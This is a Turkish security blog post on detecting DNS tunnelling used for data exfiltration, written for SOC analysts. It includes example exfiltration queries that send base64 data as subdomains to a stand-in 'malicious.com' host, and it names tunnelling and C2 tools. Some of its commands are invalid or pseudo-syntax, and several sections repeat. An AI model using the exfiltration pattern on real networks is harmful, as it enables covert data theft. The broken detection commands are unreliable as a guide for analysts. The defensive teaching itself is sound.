CyberFlow Logo CyberFlow BLOG
Soc L2 Network Analysis C2

DNS Tünelleme ile Veri Sızdırma Analizi: Siber Güvenlikteki Gerekliliği

✍️ Ahmet BİRKAN 📂 Soc L2 Network Analysis C2

DNS tünelleme ve veri sızdırma üzerine detaylı bir analiz yapıyoruz. Güvenlik açıklarını öğrenin ve koruma yöntemlerini keşfedin.

DNS Tünelleme ile Veri Sızdırma Analizi: Siber Güvenlikteki Gerekliliği

DNS tünelleme, kısıtlı ağlarda verilerin sızdırılmasının en yaygın yollarından biridir. Bu yazıda, bu tekniği anlama ve korunma yöntemlerini öğrenin.

Giriş ve Konumlandırma

DNS Tünelleme Mantığı

Siber güvenlik dünyasında, veri sızdırma yöntemleri giderek daha karmaşık ve sofistike hale gelmektedir. Bu bağlamda, DNS tünelleme (DNS Tunneling), kısıtlı bir ağda diğer portların kapalı olduğu durumlarda verilerin dışa çıkarılmasına olanak tanıyan bir tekniktir. Başka bir deyişle, veriler DNS sorguları içine gizlenerek hedef dış ağlara aktarılmaktadır. Bu yöntem, siber saldırganlar tarafından veri sızdırma amaçlı kullanılmasının yanı sıra, güvenlik profesyonellerinin de ağların güvenliğini değerlendirmesinde önemli bir konu haline gelmiştir.

DNS tünellemenin temel mantığı, DNS protokolünün doğal olarak ağ trafiği içinde şifreli veya sıkıştırılmış veri taşımaya olanak tanımasıdır. Ağ üzerindeki bu iletişim kanalı, saldırganların kötü niyetli yazılımlarını gizlemesine ve eylem aktivitelerini başarıyla gerçekleştirmesine olanak sağlar. Ayrıca, DNS üzerinden gerçekleştirilen tünelleme işlemleri, genellikle mevcut güvenlik sistemleri tarafından tespit edilmeden yürütülür, çünkü DNS trafiği genellikle öncelikli olarak işlenir ve bu nedenle göz ardı edilebilir.

Kullanılan Kayıt Türü

DNS tünelleme sırasında en sık suistimal edilen kayıt türü, TXT kayıtlarıdır. Bu kayıt türü, uzun metin dizilerini taşıyabilme kabiliyeti sayesinde zararlı payload’ları barındırmak için sıklıkla tercih edilir. Bir saldırgan, verisini example.com gibi bir alan adı altında oluşturduğu aşırı uzun alt alan adlarına (subdomain) kodlayarak dışa sızdırabilir. Örneğin, bir saldırganın saldırı sırasında kullandığı DNS sorgusunun formatı şu şekilde olabilir:

nslookup mylongsubdomain.vMVeYerSizRpcm1h.malicious.com

Bu tür anlamsız görünen alt alan adları, genellikle veri dışarı sızdırılırken kullanılan base64 formatıyla kodlandığını gösterir.

DNS Tehditleri Karşılaştırması

DNS tünelleme, yalnızca veri sızdırma amacıyla değil, aynı zamanda zararlı yazılımlara komut ve kontrol (C2) iletişimi sağlamak için de kullanılmaktadır. Bu bağlamda, DNS Amplification saldırıları ve Domain Generation Algorithm (DGA) gibi diğer DNS tabanlı tehdit vektörleri ile karşılaştırıldığında, DNS tünelleme daha uygun bir gizlilik seviyesi sunabilir. Saldırganlar, yeniden kullanılabilir ve sürekli değişen alan adları aracılığıyla tespit edilme olasılığını azaltarak hedef sistemlerle iletişim kurabilirler.

Veri Sızdırma Akışı

Veri sızdırma akışı, saldırganların hedef ağdan dışarı veri çıkarmak için kullandığı adımları içerir. Bu süreç, genellikle önceden belirlenmiş bir sırayı takip eder:

  1. Saldırgan, kurbanın ağında bir zararlı yazılım kullanarak bilgi toplar.
  2. Toplanan veriler daha sonra DNS sorguları aracılığıyla dışarı sızdırılır.
  3. Saldırgan, bu tahsis edilen alan adını kullanarak veriyi almak için DNS sunucusuyla iletişim kurar.
  4. Sonucu kullanarak the hedefteki verileri alır.

Bu aşamalar, hedef ağın güvenliğini tehdit eden karmaşık saldırıların gerçekleşmesine yol açar.

Encoding Formatı

Bu süreçte, veri genellikle base64 gibi encoding formatları kullanılarak saklanmaktadır. Base64, verilerin ASCII formatında temsil edilmesine olanak tanıyarak kolay bir şekilde DNS sorgularında taşınabilmesini sağlar. Örneğin:

dGVzdC1kYXRh

Yukarıdaki örnek, test-data metninin base64 formatında temsilidir. Saldırgan, bu tür encoded verileri DNS sorgusu içinde gizleyerek tünelleme yapar.

Tünelleme Araçları

Siber güvenlik uzmanları, DNS tünelleme tehdidini anlamak ve tespit etmek için çeşitli araçlar kullanmaktadır. Örneğin, Iodine, IPv4 trafiğini DNS sorguları üzerinden tünellemek için oldukça popüler bir araçken, Dnscat2 doğrudan DNS üzerinden şifreli bir komut ve kontrol oturumu açmak için tasarlanmıştır. Bu araçlar, hem saldırganlar hem de güvenlik uzmanları tarafından, ağ analizi ve tespit süreçlerinde önemli bir role sahiptir.

Sonuç olarak, DNS tünelleme konusunu ele alırken, bu yöntemin siber güvenlikteki gerekliliğini göz ardı etmemek gerekir. Önümüzdeki bölümlerde, DNS tünellemenin nasıl tespit edileceğini ve bu tehditlere karşı alınması gereken önlemleri detaylandıracağız. Bu şekilde, hem sızma testi (pentest) uzmanlarına hem de savunma ekiplerine değerli bilgiler sunmayı amaçlıyoruz.

Teknik Analiz ve Uygulama

DNS Tünelleme Mantığı

DNS tünelleme, kısıtlanmış bir ağda, özellikle diğer portların kapalı olduğu durumlarda, verilerin DNS sorguları içerisinde gizlenerek dışarı çıkarılmasını sağlayan bir tekniktir. Bu yöntem, saldırganların kötü niyetli yazılımlarını ve hassas verileri gizlice çıkarmalarına olanak tanır. Tünelleme, genellikle uzun ve anlamsız görünen subdomainler aracılığıyla gerçekleştirilir; bu, izlemeyi zorlaştıran bir yöntemdir.

Kullanılan Kayıt Türü

DNS tünellemede en sık suistimal edilen kayıt türü, TXT kayıtlarıdır. Bu kayıtlar, uzun metin dizilerini taşıyabilen ve zararlı payload'ları barındıran veri yapılarıdır. Aşağıdaki komut, DNS üzerinden bir TXT kaydı sorgulama örneği sunmaktadır:

dig example.com TXT

Bu komutla, belirli bir alan adı için TXT kaydı bilgileri alınabilir. Eğer verilen alan adı son derece uzun ve anlamsız bir formattaysa, burada saklanan verilere ulaşılmaya çalışıldığı anlamına gelebilir.

DNS Tehditleri Karşılaştırması

DNS protokolü üzerinden gerçekleştirilen çeşitli tehdit vektörleri ve kullanıldığı amaçları arasında şu karşılaştırma yapılabilir:

  • DNS Tünelleme: Veri sızdırma ve komut çalıştırma için çift yönlü iletişim sağlar.
  • DGA (Domain Generation Algorithm): Hedef sistemin kara listelemesini aşarak sürekli yeni alan adları üretir.
  • DNS Amplification: Küçük DNS istekleri ile hedefe büyük veri yanıtları göndererek DDoS saldırıları gerçekleştirir.

Bu tür karşılaştırmalar, DNS tünelleme gibi tehditlerin daha iyi anlaşılmasını sağlayarak, güvenlik stratejilerini şekillendirmektedir.

Veri Sızdırma Akışı

Zararlı bir yazılımın DNS üzerinden veriyi dışarı sızdırma adımları genellikle şu şekildedir:

  1. Veri parça parça şifrelenir ve base64 formatında kodlanır.
  2. Kodlanmış veri, uzun alt alan adları (subdomain) aracılığıyla DNS sorgusuna eklenir.
  3. Saldırgan, belirlediği DNS sunucusuna bu sorgularla dışarı veri çıkarır.

Aşağıdaki örnek, bir DNS sorgusuna eklenmiş base64 kodlu veri parçasını göstermektedir:

dig @malicious.com VmVyaVNpemRpcm1h

Bu sorguda VmVyaVNpemRpcm1h verisi, base64 formatında şifrelenmiş bir bilgiyi temsil etmektedir.

Encoding Formatı

Veri sızdırma sırasında kullanılan encoding formatı, genellikle base64 şeklindedir. Bu format, ikili verilerin metin tabanlıDSN sorgularına dönüştürülmesini sağlar. Bir analistin şüpheli DNS trafiğini analiz ederken kullandığı filtreleme mantığı şu şekildedir:

tcpdump -i any -n 'port 53 and (length >= threshold_value)'

Yukarıdaki komut, DNS sorgularının uzunluklarını kontrol ederek, belirli bir eşik değerinden daha uzun olan sorguları tespit etmeye yardımcı olur.

Tünelleme Araçları

Saldırganlar ve sızma testi uzmanları tarafından sıkça kullanılan bazı DNS tünelleme araçları şunlardır:

  • Iodine: Tüm IPv4 trafiğini DNS sorguları üzerinden tünellemek için kullanılan popüler bir araçtır.
  • Dnscat2: Doğrudan DNS üzerinden şifreli bir komut ve kontrol (C2) oturumu açmaya odaklanan bir uygulamadır.
  • Cobalt Strike (DNS Beacon): Gelişmiş tehdit aktörlerinin kullandığı, gizli ve yavaş iletişim kanallarını kurmak için tercih edilen bir yöntemdir.

Bu araçların kullanılması, tünel tespiti için belirli izleme ve analiz tekniklerini zorlaştırmaktadır.

Uzunluk Anomalisi

DNS tünelleme sırasında veri taşıma kapasitesi oldukça düşük olduğundan, saldırganlar büyük miktarlarda veri sızdırmak istediklerinde devasa boyutlarda DNS sorguları oluştururlar. Bu durum, uzunluk anomalisi olarak adlandırılır. Analistler, şüpheli DNS sorgularını tespit etmek için aşağıdaki mantığı kullanabilirler:

wireshark -R "dns" -V

Bu komut, ağ trafiğindeki DNS sorgularını incelemeye yardım eder ve anomalilerin belirlenmesine olanak tanır.

Hacim (Volume) Anomalisi

Veri çıkarımı sürecinde, yüksek hacimli DNS sorguları analiz edilmelidir. Çünkü bir küçük dosyanın dışarı çıkması, birçok DNS sorgusuna neden olabilir. Bu durum hacim anomalisinin belirtilerinden biridir. Tespit edilen şüpheli DNS trafiğinde sızdırılan veriyi kanıtlamak için şu adımlar izlenebilir:

  1. Şüpheli DNS trafiği PCAP dosyasında incelenir.
  2. Anlamlı hale getirilen subdomainler decode edilir.
  3. Sonuç olarak, sızdırılan verinin içeriği ifşa edilir.

Bu süreç, analistin tünellemeyi ve veri sızıntılarını doğru bir şekilde analiz etmesine yardımcı olur.

Risk, Yorumlama ve Savunma

DNS tünelleme, kısıtlı bir ağda (firewall arkasında) diğer iletişim portları kapalıyken, veri sızdırma amacıyla DNS sorguları içine gizlenen verilerin dışarı çıkarılması işlemidir. Bu teknik, genellikle güvenlik duvarları tarafından tespit edilmeyen bir başka çıkar yol arayan saldırganlar tarafından kullanılır.

Risk Analizi

Bu tür bir sızdırma yolu, güvenlik açısından büyük riskler taşır. Öncelikle DNS protokolü genellikle güvenli bir taşıyıcı olarak kabul edildiğinden, bu tür saldırılar sıklıkla göz ardı edilir. Saldırganlar, genellikle zararlı yükleri taşımak için TXT kayıtları gibi ağır metin dizilimini destekleyen kayıt türlerini kullanır.

Örneğin, bir ağda aşağıdaki gibi bir DNS sorgusu kaydedildiğinde:

VmVyaVNpemRpcm1h.malicious.com

Bu tür uzun ve anlamsız görünümlü alt alan adları, verilerin dışarıya çıkmak üzere kodlandığını gösterir. Bu tespit, ağ logları incelenirken kritik bir aşamadır.

Yorumlama

DNS tünelleme yoluyla sızdırılan veri, genellikle uzunluk ve hacim anomalileri ile tanımlanabilir. Yerel ağda yapılan DNS sorguları izlenerek anormal uzunlukta olanlar dikkatle incelenmelidir. Analistler, şu şekilde bir filtreleme uygulayarak şüpheli sorguları tespit edebilir:

filter dns query length greater than threshold

Bu sorguların hacmi de önemli bir gösterge olacaktır; çünkü genellikle saldırganlar büyük dosyaları çıkarmak için devasa miktarda DNS sorgusu üretir. Bu durumda, bir saldırgan birkaç megabaytlık bir dosyayı dışarı çıkarmak için ağda devasa bir DNS sorgu hacmi (volume) oluşturacaktır.

Yanlış Yapılandırma ve Zafiyetler

Yanlış yapılandırmalar ve zafiyetler, ağ güvenliğini olumsuz yönde etkileyen önemli faktörlerdir. Yanlış yapılandırılmış güvenlik duvarları veya yetersiz DNS trafiği izleme politikaları, DNS tünelleme gibi saldırı türlerinin fark edilmeden gerçekleştirilebilmesine olanak tanır.

Saldırganların sıkça kullandığı bazı DNS tünelleme araçları arasında Iodine ve Dnscat2 bulunmaktadır. Bu araçlar, DNS üzerinden veri iletişiminde tünel açmayı kolaylaştırır ve saldırganlara geniş bir spektrumda sızma olanağı tanır.

Savunma Önlemleri

DNS tünelleme tespitini mümkün kılmak ve önlemek için mevcut güvenlik önlemlerinin güçlendirilmesi gerekmektedir. Aşağıdaki profesyonel önlemler, ağ güvenliğinin arttırılmasına yönelik stratejiler geliştirmektedir:

  1. DNS Trafiğini İzleme: Ağda gerçekleşen DNS sorgularının sürekli izlenmesi, şüpheli aktivitelerin hızlı bir şekilde tespit edilmesine olanak tanır. Anormal uzun DNS sorguları veya beklenmedik hacimlerdeki DNS trafiği güncel loglar üzerinden kontrol edilmelidir.

  2. DNS Filtreleme: Belirli alan adlarını (domain) kara listeye almak; varsayılan DNS kayıtları için güvenilir bir şablon oluşturarak, zararlı içeriklerin ağa girmesine engel olacaktır.

  3. Hacim Analizi: DNS sorgu hacminin izlenmesi ve analiz edilmesi, anormal trafiği tanımlamak için etkili bir yöntemdir. Zaman içerisinde kaydedilen standart hacimlerin dışındaki aktiviteler dikkatle incelenmelidir.

  4. Güvenlik Eğitimi: Kullanıcılar ve güvenlik ekipleri için düzenli olarak gerçekleştirilen siber güvenlik eğitimleri, DNS tünelleme gibi modern tehditlerin anlaşılmasına katkı sağlar.

  5. Gelişmiş Ağ Güvenliği: Yeni nesil güvenlik duvarları ve IDS/IPS çözümleri kullanılmalı, uç nokta koruma sistemleri ile birleşimli çalışarak DNS trafiğinde anomali tespiti sağlanmalıdır.

Sonuç

DNS tünelleme, günümüzde siber saldırganların kullandığı etkili bir veri sızdırma tekniğidir. Bu yöntemin riskleri ve etkileri, yanlış yapılandırmalar ve yetersiz güvenlik önlemleri ile daha da artmaktadır. Gelişmiş izleme ve müdahale stratejilerinin uygulanması, bu tür tehditlere karşı savunma hattını güçlendirecektir. Her zaman dikkatli bir izleme ve sürekli güvenlik geliştirmeleri, olası veri sızıntılarını önlemenin anahtarıdır.